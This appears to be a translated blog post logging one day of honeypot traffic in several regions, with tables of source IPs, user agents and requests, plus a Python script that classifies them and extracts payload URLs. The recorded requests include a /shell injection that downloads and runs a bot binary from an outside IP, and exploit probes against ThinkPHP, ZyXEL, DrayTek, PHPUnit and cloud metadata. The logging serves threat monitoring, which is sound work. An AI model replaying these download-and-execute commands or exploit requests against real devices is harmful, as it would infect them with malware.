コンニチハレバレトシタアオゾラ

Idle as I am, I spend the day facing my blog, jotting down in no particular order the trivial things that pass through my mind,

2020/06/07 Honeypot (provisional) observation log

This is the honeypot (provisional) observation log for 2020/06/07.

Characteristics
Location: JP

The following were observed:
Access targeting DrayTek product vulnerabilities
Access targeting GPON router vulnerabilities
Access targeting NetGear product vulnerabilities
Access targeting cloud-environment metadata
Scanning by AWS Security Scanner
Scanning by polaris botnet
Scanning by XTC
Scanning by zgrab
Scanning for phpMyAdmin
Unauthorized traffic involving 18[.]179[.]20[.]5

The following access to /shell was observed:

cd /tmp;
rm -rf *;
wget 185.172.111.214/bins/UnHAnaAW.x86;
chmod 777 /tmp/UnHAnaAW.x86;
sh /tmp/UnHAnaAW.x86

Location: US

The following were observed:
Access targeting Axis product vulnerabilities
Access targeting DrayTek product vulnerabilities
Access targeting the PHPUnit vulnerability (CVE-2017-9841)
Access targeting ThinkPHP vulnerabilities
Access targeting the ZyXEL NAS vulnerability (CVE-2020-9054)
Scanning by XTC
Scanning for Apache Solr
Access with User-Agent "Hello, world"

The following access to /shell was observed:

cd /tmp;
rm -rf *;
wget 185.172.111.214/bins/UnHAnaAW.x86;
chmod 777 /tmp/UnHAnaAW.x86;
sh /tmp/UnHAnaAW.x86 w00dy.jaws

Location: UK

The following were observed:
Access targeting DrayTek product vulnerabilities
Access targeting the PHPUnit vulnerability (CVE-2017-9841)
Access targeting ThinkPHP vulnerabilities
Access targeting the ZyXEL NAS vulnerability (CVE-2020-9054)
Scanning by XTC BOTNET
Scanning by zgrab
Scanning for Apache Solr

Location: SG

The following were observed:
Access targeting DrayTek product vulnerabilities
Access targeting Linear eMerge E3 product vulnerabilities
Access targeting the PHPUnit vulnerability (CVE-2017-9841)
Access targeting ThinkPHP vulnerabilities
Access targeting the ZyXEL NAS vulnerability (CVE-2020-9054)
Scanning by XTC
Scanning by zgrab
Scanning for Apache Solr
Unauthorized traffic involving 123[.]126[.]104[.]68
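The per-location characteristics above are a hand classification of the request tables that follow. As an added example (my own code, not the honeypot's or the blog's), the script below does that classification automatically over a constructed subset of the JP request table, refangs the "[.]" / "[:]" notation the post uses, and pulls the payload download URL out of the /shell command injection so it can be fed to blocklists. The category labels follow the post's wording; the regexes, the "CONNECT proxy probe" and "other HTTP" buckets, and the sample subset are my assumptions.

```python
"""Classify honeypot request-table lines into the categories the post uses.

Added example: the rules are my own regexes written from the request strings
the post lists; they are not the honeypot's own code.
"""
import re
from collections import Counter
from urllib.parse import unquote_plus

# One line of the post's request table: "<count> <METHOD> <target> <protocol>".
LINE_RE = re.compile(r"^(\d+)\s+([A-Z]+)\s+(\S+)\s+(HTTP/\d\.\d)$")

# (label, regex over the refanged request target). Order matters: first match wins.
RULES = [
    ("DrayTek (mainfunction.cgi)", re.compile(r"^/cgi-bin/mainfunction\.cgi")),
    ("GPON router (diag_Form)", re.compile(r"^/GponForm/diag_Form")),
    ("NetGear (setup.cgi todo=syscmd)", re.compile(r"^/setup\.cgi\?.*todo=syscmd")),
    ("ZyXEL NAS (CVE-2020-9054)", re.compile(r"^/adv,/cgi-bin/weblogin\.cgi")),
    ("PHPUnit (CVE-2017-9841)", re.compile(r"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin\.php")),
    ("ThinkPHP", re.compile(r"invokefunction|^/index\.php\?s=captcha|HelloThinkCMF")),
    ("Linear eMerge E3 (card_scan_decoder.php)", re.compile(r"^/card_scan_decoder\.php")),
    ("Axis (param.cgi)", re.compile(r"^/axis-cgi/")),
    ("Apache Solr scan", re.compile(r"^/solr/admin/info/system")),
    ("cloud metadata (IMDS)", re.compile(
        r"169\.254\.169\.254|\[::ffff:a9fe:a9fe\]|^/latest/dynamic/instance-identity")),
    ("phpMyAdmin scan", re.compile(r"/index\.php\?lang=en$")),
    ("/shell command injection", re.compile(r"^/shell\?")),
]

# "wget <url>" / "curl [opts] <url>" inside a decoded command string; stops at ; | & or space.
DOWNLOAD_RE = re.compile(r"\b(?:wget|curl)\s+(?:-[^\s;]+\s+)*((?:https?://)?[^\s;|&]+)")

# Constructed subset of the post's JP request table (counts as printed there).
SAMPLE = r"""
10 CONNECT 18[.]179[.]20[.]5:80 HTTP/1.0
1 GET /PMA/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin/index.php?lang=en HTTP/1.1
4 GET /latest/dynamic/instance-identity/document HTTP/1.1
2 GET http[:]//169[.]254[.]169[.]254/latest/dynamic/instance-identity/document HTTP/1.1
2 GET http://[::ffff:a9fe:a9fe]/ HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1 HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86 HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /cgi-bin/mainfunction.cgi HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1
1 GET /robots.txt HTTP/1.1
2 \x03
"""


def refang(s):
    """Undo the [.] / [:] defanging the post applies to IPs and URLs."""
    return s.replace("[.]", ".").replace("[:]", ":")


def classify(method, target):
    """Map one request to a category label; CONNECT is an open-proxy probe regardless of target."""
    if method == "CONNECT":
        return "CONNECT proxy probe"
    t = refang(target)
    for label, pattern in RULES:
        if pattern.search(t):
            return label
    return "other HTTP"


def extract_download_urls(target):
    """Return payload URLs named in wget/curl commands embedded in a request target."""
    return DOWNLOAD_RE.findall(unquote_plus(refang(target)))


def parse_line(line):
    """Split a table line; lines without an HTTP method (raw bytes, truncated) keep only their count."""
    line = line.strip()
    m = LINE_RE.match(line)
    if m:
        count, method, target, proto = m.groups()
        return {"count": int(count), "method": method, "target": target, "proto": proto}
    parts = line.split(None, 1)
    count = int(parts[0]) if parts and parts[0].isdigit() else 1
    return {"count": count, "method": None, "target": parts[1] if len(parts) > 1 else "", "proto": None}


def summarize(table_text):
    """Return (category -> request count weighted by the table's count column, payload URLs seen)."""
    categories = Counter()
    urls = []
    for line in table_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec["method"] is None:
            categories["non-HTTP / raw bytes"] += rec["count"]
            continue
        categories[classify(rec["method"], rec["target"])] += rec["count"]
        urls.extend(extract_download_urls(rec["target"]))
    return categories, urls


if __name__ == "__main__":
    cats, seen_urls = summarize(SAMPLE)
    for label, n in cats.most_common():
        print(f"{n:4d}  {label}")
    print("payload URLs:", seen_urls)
```

The refang step is what makes the metadata rule fire on the "http[:]//169[.]254[.]169[.]254/" lines; without it the IPv4-mapped IPv6 form "[::ffff:a9fe:a9fe]" would be the only IMDS hit, which is exactly the evasion such requests rely on. The same extractor also recovers "http://switchnets.net/hoho.arm7" from the Linear eMerge E3 line in the SG table, since it decodes the %60 backtick before looking for wget.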

Access count trend

JP: total accesses: 79 (day-over-day: -84)
US: total accesses: 30 (day-over-day: -88)
UK: total accesses: 19 (day-over-day: -18)
SG: total accesses: 48 (day-over-day: +31)

For convenience, GET / HTTP/1.1 and POST / HTTP/1.1 are excluded from the counts.

Location: JP

Source IP address list

Count Source IP address Country
1 1.9.175.41 Malaysia
1 18.176.56.123 United States
34 44.225.84.206 United States
2 45.141.84.40 Russia
1 47.206.38.79 United States
4 80.82.77.33 Netherlands
28 89.135.141.89 Hungary
1 109.184.64.24 Russia
1 113.14.202.161 China
1 142.111.201.122 United States
1 162.243.141.121 United States
1 162.243.142.155 United States
1 177.207.81.134 Brazil
1 190.128.226.34 Paraguay
1 200.52.44.207 Mexico

User-Agent list

Count User-Agent
26 -
14 AWS Security Scanner
1 Go-http-client/1.1
1 Hello, World
1 Hello, world
2 Mozilla/5.0
28 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
2 Mozilla/5.0 zgrab/0.x
1 XTC
1 curl/7.29.0
1 polaris botnet
1 python-requests/2.23.0

Request list

Count Method Request Protocol
1 -
2 \x03
10 \x16\x03\x01
10 CONNECT 18[.]179[.]20[.]5:80 HTTP/1.0
1 GET /.well-known/security.txt HTTP/1.1
1 GET /2phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /MyAdmin/index.php?lang=en HTTP/1.1
1 GET /PMA/index.php?lang=en HTTP/1.1
1 GET /admin/index.php?lang=en HTTP/1.1
1 GET /database/index.php?lang=en HTTP/1.1
1 GET /db/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /dbadmin/index.php?lang=en HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /hudson HTTP/1.1
4 GET /latest/dynamic/instance-identity/document HTTP/1.1
1 GET /myadmin/index.php?lang=en HTTP/1.1
1 GET /mysql/admin/index.php?lang=en HTTP/1.1
1 GET /mysql/dbadmin/index.php?lang=en HTTP/1.1
1 GET /mysql/index.php?lang=en HTTP/1.1
1 GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpMyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmy/index.php?lang=en HTTP/1.1
1 GET /phpmyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin1/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin4/index.php?lang=en HTTP/1.1
1 GET /phppma/index.php?lang=en HTTP/1.1
1 GET /pma/index.php?lang=en HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /program/index.php?lang=en HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1 HTTP/1.1
1 GET /shell?busybox HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86 HTTP/1.1
1 GET /shopdb/index.php?lang=en HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /t HTTP/1.1
1 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1
2 GET http://[::ffff:a9fe:a9fe]/ HTTP/1.1
2 GET http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document HTTP/1.1
2 GET http[:]//169[.]254[.]169[.]254/ HTTP/1.1
2 GET http[:]//169[.]254[.]169[.]254/latest/dynamic/instance-identity/document HTTP/1.1
2 GET http[:]//example[.]com/ HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /boaform/admin/formPing HTTP/1.1
1 POST /cgi-bin/mainfunction.cgi HTTP/1.1

Location: US

Source IP address list

Count Source IP address Country
1 24.138.226.129 Puerto Rico
1 37.49.226.24 Netherlands
1 41.78.172.77 Nigeria
2 45.141.84.40 Russia
10 116.199.2.34 China
1 190.96.67.243 Chile
10 195.54.160.135 Russia
2 198.178.8.34 United States
1 200.46.45.114 Panama
1 201.21.226.33 Brazil

User-Agent list

Count User-Agent
3 -
2 AccServer[NCO-AVIGILON02]/6.2.2.6(40263) 64-bit HTTP-Agent
1 Go-http-client/1.1
1 Hello, world
2 Mozilla/5.0
1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
10 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1 XTC

Request list

Count Method Request Protocol
2 \x03
1 \x16\x03\x01\x02
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1
2 GET /axis-cgi/admin/param.cgi?action=list&group=Properties HTTP/1.0
1 GET /elrekt.php HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /public/index.php HTTP/1.1
1 GET /shell?busybox HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86+w00dy.jaws HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
2 POST /cgi-bin/mainfunction.cgi HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1

Location: UK

Source IP address list

Count Source IP address Country
2 45.141.84.40 Russia
1 83.110.9.93 United Arab Emirates
1 95.9.202.235 Turkey
1 104.199.191.188 United States
1 162.243.141.12 United States
1 162.243.143.49 United States
12 195.54.160.135 Russia

User-Agent list

Count User-Agent
2 -
1 Go-http-client/1.1
1 Mozilla/5.0
12 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 zgrab/0.x
1 XTC BOTNET

Request list

Count Method Request Protocol
2 \x03
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1
1 GET /hudson HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1
1 GET /portal/redlion HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /t HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /cgi-bin/mainfunction.cgi HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1

Location: SG

Source IP address list

Count Source IP address Country
1 14.241.249.199 Vietnam
1 61.219.11.153 Taiwan
1 91.203.61.191 Ukraine
10 122.51.29.221 China
7 148.70.99.99 China
1 162.243.138.141 United States
1 185.202.2.149 Netherlands
1 185.244.39.112 Netherlands
1 191.180.225.24 Brazil
19 195.54.160.135 Russia
2 208.91.109.50 United States
1 217.58.61.49 Italy
2 222.129.37.226 China

User-Agent list

Count User-Agent
6 -
1 Go-http-client/1.1
1 Mozilla/5.0
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
19 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
16 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
1 Mozilla/5.0 zgrab/0.x
2 XTC

Request list

Count Method Request Protocol
1 -
1 \x03
1 CONNECT 123[.]126[.]104[.]68:80 HTTP/1.1
3 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
3 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /TP/html/public/index.php HTTP/1.1
2 GET /TP/index.php HTTP/1.1
2 GET /TP/public/index.php HTTP/1.1
1 GET /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf HTTP/1.1
1 GET /card_scan_decoder.php?No=30&door=%60wget http[:]//switchnets[.]net/hoho.arm7;
2 GET /elrekt.php HTTP/1.1
2 GET /html/public/index.php HTTP/1.1
1 GET /hudson HTTP/1.1
2 GET /index.php HTTP/1.1
3 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1
2 GET /public/index.php HTTP/1.1
3 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /thinkphp/html/public/index.php HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET http[:]//js[.]sogou[.]com/pv_sogou.js HTTP/1.1
2 HEAD /robots.txt HTTP/1.0
3 POST /api/jsonws/invoke HTTP/1.1
2 POST /cgi-bin/mainfunction.cgi HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1